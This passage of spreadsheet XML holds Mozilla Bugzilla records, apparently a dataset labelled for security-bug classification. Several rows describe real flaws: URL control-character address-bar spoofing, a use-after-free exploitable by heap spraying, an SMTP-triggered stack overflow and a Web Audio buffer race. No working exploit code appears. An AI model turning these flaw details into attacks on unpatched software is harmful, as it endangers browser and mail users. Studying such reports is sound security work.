      <c r="U2175" t="n">
        <v>0</v>
      </c>
      <c r="V2175" t="n">
        <v>84</v>
      </c>
      <c r="W2175" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Invisible Control characters (%0B,%0C,%1C,%1D,%1E and %1F in URL) MUST NOT de decoded in location bar.
Reproducible: Always
Steps to Reproduce:
1.Goto https://wiki.mozilla.org/?a=%0B,%0C,%1C,%1D,%1E,%1F,
2.See your location bar
3.
Actual Results:  
Location bar shows https://wiki.mozilla.org/?a=%0B,%0C,%1C,%1D,%1E,%1F, as decoded string.
But %0B,%0C,%1C,%1D,%1E and %1F not visible.
You will read it as  "https://wiki.mozilla.org/?a=,,,,,,".
Expected Results:  
Invisible characters (%0B,%0C,%1C,%1D,%1E and %1F) MUST NOT decoded on location bar.
According to result of
"https://wiki.mozilla.org/?a=%00,%01,%02,%03,%04,%05,%06,%07,%08,%09,%0A,%0B,%0C,%0D,%0E,%0F,%10,%11,%12,%13,%14,%15,%16,%17,%18,%19,%1A,%1B,%1C,%1D,%1E,%1F,%7F,",
Other controll characters that between %00 and %7F does not have same problem.
This issue can be used to address bar spoofing.</t>
        </is>
      </c>
      <c r="X2175" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2176">
      <c r="A2176" t="n">
        <v>712244</v>
      </c>
      <c r="B2176" t="inlineStr">
        <is>
          <t>2011-12-20 02:35:23 -0800</t>
        </is>
      </c>
      <c r="C2176" t="inlineStr">
        <is>
          <t>increase or work around hitting MAX_BROKER_REFS on test masters (too many builders per slave problem)</t>
        </is>
      </c>
      <c r="D2176" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E2176" t="n">
        <v>1</v>
      </c>
      <c r="F2176" t="n">
        <v>1</v>
      </c>
      <c r="G2176" t="n">
        <v>5</v>
      </c>
      <c r="H2176" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2176" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2176" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2176" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2176" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2176" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2176" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2176" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2176" t="inlineStr">
        <is>
          <t>[buildmasters][capacity]</t>
        </is>
      </c>
      <c r="Q2176" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2176" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2176" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2176" t="n">
        <v>1</v>
      </c>
      <c r="U2176" t="n">
        <v>0</v>
      </c>
      <c r="V2176" t="n">
        <v>42</v>
      </c>
      <c r="W2176" t="inlineStr">
        <is>
          <t>Seen on talos-r3-xp-037 trying to talk to buildbot-master16:
2011-12-19 11:19:51-0800 [Broker,client] ReconnectingPBClientFactory.failedToGetPerspective
2011-12-19 11:19:51-0800 [Broker,client] While trying to connect:
        Traceback from remote host -- Traceback (most recent call last):
          File "/builds/buildbot/tests1-windows/lib/python2.6/site-packages/twisted/internet/defer.py", line 363, in unpause
            self._runCallbacks()
...
          File "/builds/buildbot/tests1-windows/lib/python2.6/site-packages/twisted/spread/pb.py", line 664, in registerReference
            raise Error("Maximum PB reference count exceeded.  "
        twisted.spread.pb.Error: Maximum PB reference count exceeded.  Goodbye.
Connected fine after a reboot, so tried to hit the master during a reconfig ?</t>
        </is>
      </c>
      <c r="X2176" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2177">
      <c r="A2177" t="n">
        <v>567154</v>
      </c>
      <c r="B2177" t="inlineStr">
        <is>
          <t>2010-05-20 10:41:23 -0700</t>
        </is>
      </c>
      <c r="C2177" t="inlineStr">
        <is>
          <t>Configure single buildslave in production to generate nightly Windows 64-bit builds</t>
        </is>
      </c>
      <c r="D2177" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E2177" t="n">
        <v>1</v>
      </c>
      <c r="F2177" t="n">
        <v>1</v>
      </c>
      <c r="G2177" t="n">
        <v>5</v>
      </c>
      <c r="H2177" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2177" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2177" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2177" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2177" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2177" t="inlineStr">
        <is>
          <t>Windows Server 2008</t>
        </is>
      </c>
      <c r="N2177" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2177" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2177" t="inlineStr">
        <is>
          <t>[win64][automation][q1goal]</t>
        </is>
      </c>
      <c r="Q2177" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2177" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2177" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2177" t="n">
        <v>1</v>
      </c>
      <c r="U2177" t="n">
        <v>0</v>
      </c>
      <c r="V2177" t="n">
        <v>24</v>
      </c>
      <c r="W2177" t="inlineStr">
        <is>
          <t>We've run into a bit of a chicken-and-egg problem with getting the Windows 64-bit builds into a decent state. Without builds and logs (and eventually symbols) for developers to look at, we haven't been able to get much help from developers in debugging issues and getting builds to a nightly state. 
Armen has been able to generate a 64bit Windows build, so he has a toolchain that works. The build crashes right away though. We don't necessarily want to deploy the current toolchain across a collection of buildslaves until we're sure generated builds are usable.
I'm going to suggest we try something new/different.
After talking with joduinn this morning, we'd like to hook up Armen's single Win64 builder to production-master and have it build nightly builds on trunk. By doing this, we can iterate on the toolchain as required, trigger builds as required, and generate builds and logs for developers to use as we go.
Once we have working builds from an agreed-upon toolchain, we can scale this up.
We can put the Win64 nightly builds into the experimental/ dir until they (at least) start up. We should disable updates, testing, etc in the mozconfig to start.</t>
        </is>
      </c>
      <c r="X2177" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2178">
      <c r="A2178" t="n">
        <v>634983</v>
      </c>
      <c r="B2178" t="inlineStr">
        <is>
          <t>2011-02-17 11:19:23 -0800</t>
        </is>
      </c>
      <c r="C2178" t="inlineStr">
        <is>
          <t>Use-after-free vulnerability in OBJECT's mObserverList (ZDI-CAN-1033)</t>
        </is>
      </c>
      <c r="D2178" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E2178" t="n">
        <v>1</v>
      </c>
      <c r="F2178" t="n">
        <v>1</v>
      </c>
      <c r="G2178" t="n">
        <v>3</v>
      </c>
      <c r="H2178" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2178" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2178" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K2178" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L2178" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2178" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2178" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2178" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2178" t="inlineStr">
        <is>
          <t>[sg:critical?] fixed by 604262</t>
        </is>
      </c>
      <c r="Q2178" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2178" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2178" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2178" t="n">
        <v>1</v>
      </c>
      <c r="U2178" t="n">
        <v>0</v>
      </c>
      <c r="V2178" t="n">
        <v>17</v>
      </c>
      <c r="W2178" t="inlineStr">
        <is>
          <t>The following was reported to security@mozilla.org by ZDI:
ZDI-CAN-1033: Mozilla Firefox OBJECT mObserverList Remote Code Execution Vulnerabililty
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following products:
    Mozilla Firefo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Firefox's handling of observer OBJECTs. If an observer OBJECT is removed from the mObserverList during an iteration of LOOP_OVER_OBSERVERS macro, one can heap spray over |mObserverList.mNext| and change the execution flow. This would allow the attacker to execute arbitrary code under the context of the user running the browser.
Version(s) tested: Firefox 3.6.13
Platform(s) tested: Windows XP SP3
As the OBJECT element implements nsIImageLoadingContent interface it is possible to register custom observer (implementing imgIDecoderObserver) and force our OBJECT removal during e.g.  onStartContainer| callback (other hooks are probably dangerous as well). That would also destroy object's observers linked list, |mObserverList|. If that happens during iteration of LOOP_OVER_OBSERVERS macro one can heap spray over |mObserverList.mNext| and change the execution flow.
From content/base/src/nsObjectLoadingContent.cpp:
// Macro to call some func on each observer.  This handles observers
// removing themselves.
#define LOOP_OVER_OBSERVERS(func_)                                      
\
  PR_BEGIN_MACRO                                                        
\
    for (ImageObserver* observer = &amp;mObserverList, *next; observer;     
\
         observer = next) {                                             
\
      next = observer-&gt;mNext;                                           
\
      if (observer-&gt;mObserver) {                                        
\
        observer-&gt;mObserver-&gt;func_;                                     
\
      }                                                                 
\
    }                                                                   
\
  PR_END_MACRO
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2178" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2179">
      <c r="A2179" t="n">
        <v>1677338</v>
      </c>
      <c r="B2179" t="inlineStr">
        <is>
          <t>2020-11-14 14:32:12 -0800</t>
        </is>
      </c>
      <c r="C2179" t="inlineStr">
        <is>
          <t>Stack smashing in nsSmtpProtocol.cpp.</t>
        </is>
      </c>
      <c r="D2179" t="inlineStr">
        <is>
          <t>2021-11-22 23:34:24 -0800</t>
        </is>
      </c>
      <c r="E2179" t="n">
        <v>1</v>
      </c>
      <c r="F2179" t="n">
        <v>1</v>
      </c>
      <c r="G2179" t="n">
        <v>2</v>
      </c>
      <c r="H2179" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2179" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J2179" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2179" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2179" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2179" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2179" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2179" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2179" t="inlineStr"/>
      <c r="Q2179" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2179" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2179" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T2179" t="n">
        <v>1</v>
      </c>
      <c r="U2179" t="n">
        <v>0</v>
      </c>
      <c r="V2179" t="n">
        <v>29</v>
      </c>
      <c r="W2179" t="inlineStr">
        <is>
          <t>Created attachment 9187872
Excerpt of an ASAN error (the first one in xpcshell test)
This is a serious security bug. It is not a drill.
While I ran xpcshell tests with ASAN version of DEBUG C-C TB
binary, I found a serious problem.
There is a memory overwrite that smashes stack one way or the other.
Luckily the culprit is identified and  it is a single line of code.
But the security implication is serious.
```
Output of grep -i sanitizer: log1274-xpcshell.txt 
 0:08.69 pid:346406 ==346406==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdb325bb40 at pc 0x7f8c8bad9daa bp 0x7ffdb325b770 sp 0x7ffdb325b768
 0:09.88 pid:346406 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 0:47.54 pid:346883 ==346883==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd70313e40 at pc 0x7f5c8e195daa bp 0x7ffd70313a70 sp 0x7ffd70313a68
 0:48.73 pid:346883 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 1:02.46 pid:347101 ==347101==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcfb9efa80 at pc 0x7f3463413daa bp 0x7ffcfb9ef6b0 sp 0x7ffcfb9ef6a8
 1:03.62 pid:347101 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 1:04.67 pid:347128 ==347128==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdec4320a0 at pc 0x7effbe12bdaa bp 0x7ffdec431cd0 sp 0x7ffdec431cc8
 1:05.83 pid:347128 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 1:08.26 pid:347177 ==347177==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd44e37f20 at pc 0x7f1f37688daa bp 0x7ffd44e37b50 sp 0x7ffd44e37b48
 1:09.45 pid:347177 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 1:10.50 pid:347203 ==347203==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe09142780 at pc 0x7ff5e7023daa bp 0x7ffe091423b0 sp 0x7ffe091423a8
 1:11.70 pid:347203 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 1:12.75 pid:347229 ==347229==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffddf1f1f60 at pc 0x7f7076971daa bp 0x7ffddf1f1b90 sp 0x7ffddf1f1b88
 1:14.05 pid:347229 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 1:33.80 pid:347484 ==347484==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcf66e0a40 at pc 0x7f2494993daa bp 0x7ffcf66e0670 sp 0x7ffcf66e0668
 1:34.98 pid:347484 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 2:16.33 pid:347965 ==347965==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdbc966340 at pc 0x7fb7ef7badaa bp 0x7ffdbc965f70 sp 0x7ffdbc965f68
 2:17.50 pid:347965 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 2:32.50 pid:348179 ==348179==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffde9061480 at pc 0x7f2fe1807daa bp 0x7ffde90610b0 sp 0x7ffde90610a8
 2:33.70 pid:348179 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 2:34.84 pid:348206 ==348206==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff5d1317e0 at pc 0x7f339d7e3daa bp 0x7fff5d131410 sp 0x7fff5d131408
 2:36.03 pid:348206 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 2:38.70 pid:348254 ==348254==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe44b93d20 at pc 0x7ff301338daa bp 0x7ffe44b93950 sp 0x7ffe44b93948
 2:39.87 pid:348254 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 2:41.03 pid:348280 ==348280==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd0075b2c0 at pc 0x7f981c7b4daa bp 0x7ffd0075aef0 sp 0x7ffd0075aee8
 2:42.20 pid:348280 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
 2:43.35 pid:348306 ==348306==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffd3723520 at pc 0x7f553b191daa bp 0x7fffd3723150 sp 0x7fffd3723148
 2:44.65 pid:348306 SUMMARY: AddressSanitizer: stack-buffer-overflow /NEW-SSD/NREF-COMM-CENTRAL/mozilla/nsprpub/pr/src/io/prscanf.c:288:51 in GetInt
```
I am attaching an excerpt from the xpcshelltes log with ASAN version of C-C TB with DEBUG flag.
Problem occurs here.
https://searchfox.org/comm-central/source/mailnews/compose/src/nsSmtpProtocol.cpp#563
```
     char codeClass, codeSubject, codeDetail;
---&gt; if (PR_sscanf(line + chars_read, "%1u.%1u.%1u ", &amp;codeClass, &amp;codeSubject,
                  &amp;codeDetail) == 3)
      m_responseCodeEnhanced = codeClass * 100 + codeSubject * 10 + codeDetail;
```
Note that |codeClass|, |codeSubject|, |codeDetail| are declared as |char| type.
However, the specifier has 'u' and not 'c'.
The intention seems to read a number to the varialbles.
This is the klux of the problem.
As I see it, PR_sscanf() processing of '%1u' is going through the hoops, but
eventually the scan function assumes that value's width is tagged as
(without specification such as 'h','l', 'll', 'L', etc.)
```
  state-&gt;sizeSpec = _PR_size_none; 
```
( https://searchfox.org/comm-central/source/mozilla/nsprpub/pr/src/io/prscanf.c#556 )
But then after the value is scanned and computed (for, %1u, that is %u), it is written back to the pointer of the variable that receives the value with the following statement.
This is in the call chain of Convert() -&gt; GetInt().
https://searchfox.org/comm-central/source/mozilla/nsprpub/pr/src/io/prscanf.c#287
```
                unsigned long lval = strtoul(buf, NULL, base);
---&gt;            if (state-&gt;sizeSpec == _PR_size_none) {
                    *va_arg(state-&gt;ap, PRUintn *) = lval;
```
PRUintn is unsigned int according to the following.:
https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSPR/Reference/PRUintn
And it is indeed 4 bytes according to attached ASAN log.
So WE ARE WRITING 4 (FOUR) BYTES INTO CHARACTER VARIABLES ON THE STACK (!)
ASAN aborts the program on the first write, but all the three variables have memory overwrite issues.
Thus the code  stomps on whatever memory value out there on the stack. Grrr...
DoS possibility.
I think this could have been exploited by malicious SMTP server to cause at least a denial of service attack on some unfortunate TB binaries (this depends on how the auto variables are placed on the stack. The layout differs from a compiler to the other, and optimization-level and debug flag may affect the layout and code. So it is hard to say definitely.)
Serious Exploit?
Whether this could have been used to exploit unsuspecting user's computer, I am not sure. But again it is up to the particular compiler and the particular optimization and debug level, and CPU-depdendent... There may have been unfortunate TB binaries.
Still this is a very serious bug.
I don't know why my earlier valgrind run of xpcshell tests did not reveal this bug.  (Maybe, just maybe, the particular tests did not run under valgrind because of the timeout that are caused by x10-20 slowdown due to valgrind. I need to figure out how to extend xpctest timeout for valgrind run. At least, I should be able to reproduce the issue under valgrind with proper setting of timeout for the tests that triggered the issue reported here.)
Getting this fixed is the first priority, but I have a proposal.
I understand ASAN binary of TB is created for nightly these days.
Suggestion/Proposal
On the tryserver, we should run a mochitest and xpcshell test using the ASAN binary at least once a month for C-C, and/or as new nightly appears.
For running xpcshell tests, we should add "--serialize" and "--verbose" flag.
This is how I run my local memory tests of C-C TB.
Otherwise, the error messages may not be visible at all and the error messages get mixed up among different processes and hard to analyze. 
I would also suggest a monthly valgrind run.
But, I have not been able to run C-C TB  mochitest under valgrind at all since we switched to mochitest from |make mozmill| test suite. Tough.
Also, I have no idea why, but valgrind cannot run the big TB binary as ordinary user anymore on my Debian GNU/Linux OS. It seems that Valgrind+TB fails when the stack needs to be extended (i.e., new page needs to be mapped for the stack.).
Valgrind+C-C TB does run under superuser. However, mochitest has its own problem and I never get past the initial window or anything. I set the time out to more than 30 minutes, but eventually, the timeout is triggered before no tests are performed with mochitest.
|make mozmll| ran fine after my tweaking of timeout values...
xpcshelltests do run and I could find a few memory-related errors.</t>
        </is>
      </c>
      <c r="X2179" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2180">
      <c r="A2180" t="n">
        <v>1047613</v>
      </c>
      <c r="B2180" t="inlineStr">
        <is>
          <t>2014-08-01 13:17:42 -0700</t>
        </is>
      </c>
      <c r="C2180" t="inlineStr">
        <is>
          <t>Awesomebar-results-pane repeatedly opening up when typing a visited domain</t>
        </is>
      </c>
      <c r="D2180" t="inlineStr">
        <is>
          <t>2016-08-05 06:13:11 -0700</t>
        </is>
      </c>
      <c r="E2180" t="n">
        <v>1</v>
      </c>
      <c r="F2180" t="n">
        <v>1</v>
      </c>
      <c r="G2180" t="n">
        <v>2</v>
      </c>
      <c r="H2180" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2180" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2180" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K2180" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2180" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2180" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2180" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2180" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2180" t="inlineStr">
        <is>
          <t>[unifiedautocomplete][suggestions][fxsearch]</t>
        </is>
      </c>
      <c r="Q2180" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2180" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2180" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T2180" t="n">
        <v>1</v>
      </c>
      <c r="U2180" t="n">
        <v>1</v>
      </c>
      <c r="V2180" t="n">
        <v>44</v>
      </c>
      <c r="W2180" t="inlineStr">
        <is>
          <t>Created attachment 8466420
screencap.mp4
When typing a previously visited domainname (i.e. 'mozilla.org'), the results-pane of the locationbar is reopening after every typed latter.
Setting browser.urlbar.unifiedcomplete to false reverts this problem.
Screencap:
First typing the domain before it's visited (no problem), then after it's visited (problem), then after disabling the pref (no problem).
Regression-range:
m-c:
Last good revision: a91ec42d6a9c (2014-07-24)
First bad revision: 613e79262240 (2014-07-25)
Pushlog:
https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=a91ec42d6a9c&amp;tochange=613e79262240
m-i:
Last good revision: b0a916157c9a
First bad revision: de374e83ed83
Pushlog:
https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=b0a916157c9a&amp;tochange=de374e83ed83</t>
        </is>
      </c>
      <c r="X2180" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2181">
      <c r="A2181" t="n">
        <v>1007223</v>
      </c>
      <c r="B2181" t="inlineStr">
        <is>
          <t>2014-05-07 10:46:15 -0700</t>
        </is>
      </c>
      <c r="C2181" t="inlineStr">
        <is>
          <t>AudioContext::DecodeAudioData passes ArrayBuffer data across threads without transferring it</t>
        </is>
      </c>
      <c r="D2181" t="inlineStr">
        <is>
          <t>2015-09-22 02:10:53 -0700</t>
        </is>
      </c>
      <c r="E2181" t="n">
        <v>1</v>
      </c>
      <c r="F2181" t="n">
        <v>1</v>
      </c>
      <c r="G2181" t="n">
        <v>3</v>
      </c>
      <c r="H2181" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2181" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2181" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K2181" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2181" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2181" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2181" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2181" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2181" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q2181" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2181" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2181" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T2181" t="n">
        <v>1</v>
      </c>
      <c r="U2181" t="n">
        <v>0</v>
      </c>
      <c r="V2181" t="n">
        <v>46</v>
      </c>
      <c r="W2181" t="inlineStr">
        <is>
          <t>void
AudioContext::DecodeAudioData(const ArrayBuffer&amp; aBuffer,
                              DecodeSuccessCallback&amp; aSuccessCallback,
                              const Optional&lt;OwningNonNull&lt;DecodeErrorCallback&gt; &gt;&amp; aFailureCallback)
{
  // Sniff the content of the media.
  // Failed type sniffing will be handled by AsyncDecodeMedia.
  nsAutoCString contentType;
  NS_SniffContent(NS_DATA_SNIFFER_CATEGORY, nullptr,
                  aBuffer.Data(), aBuffer.Length(),
                  contentType);
  nsRefPtr&lt;DecodeErrorCallback&gt; failureCallback;
  if (aFailureCallback.WasPassed()) {
    failureCallback = &amp;aFailureCallback.Value();
  }
  nsRefPtr&lt;WebAudioDecodeJob&gt; job(
    new WebAudioDecodeJob(contentType, this, aBuffer,
                          &amp;aSuccessCallback, failureCallback));
  mDecoder.AsyncDecodeMedia(contentType.get(),
                            aBuffer.Data(), aBuffer.Length(), *job);
  // Transfer the ownership to mDecodeJobs
  mDecodeJobs.AppendElement(job);
}
When |aBuffer| is passed to |WebAudioDecodeJob|, the underlying object is cached in the decode job.  We pass in the length and the raw data from the ArrayBuffer into AsyncDecodeMedia.  In there we create a |new MediaDecodeTask(aContentType, aBuffer, aLength, aDecodeJob, mThreadPool);|, then |CreateReader()| on it.  That creates a |BufferMediaResource| passing in the raw buffer pointer.  And |BufferMediaResource| does all sorts of stuff to what's in the pointer/length pair.  Boo-urns.  Or am I misreading this somehow?
(Of course, this is all problematic because the buffer passed into decodeAudioData is user-controlled and can be neutered at any point after the call completes [but before the decoding task stuff completes].  Or the data could be moved around there's sufficiently little of it and someone does something that requests a *stable* address for the data, causing the data to be copied into heap-allocated permanent [modulo neutering] storage.  Just to absolutely clear to any readers not fully on top of this.)</t>
        </is>
      </c>
      <c r="X2181" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2182">
      <c r="A2182" t="n">
        <v>963962</v>
      </c>
      <c r="B2182" t="inlineStr">
        <is>
          <t>2014-01-25 11:48:38 -0800</t>
        </is>
      </c>
      <c r="C2182" t="inlineStr">
        <is>
          <t>crash in sse2_composite_src_x888_8888</t>
        </is>
      </c>
      <c r="D2182" t="inlineStr">
        <is>
          <t>2018-07-20 12:41:06 -0700</t>
        </is>
      </c>
      <c r="E2182" t="n">
        <v>1</v>
      </c>
      <c r="F2182" t="n">
        <v>1</v>
      </c>
      <c r="G2182" t="n">
        <v>3</v>
      </c>
      <c r="H2182" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2182" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2182" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2182" t="inlineStr">
        <is>
          <t>28 Branch</t>
        </is>
      </c>
      <c r="L2182" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2182" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N2182" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2182" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2182" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q2182" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2182" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2182" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
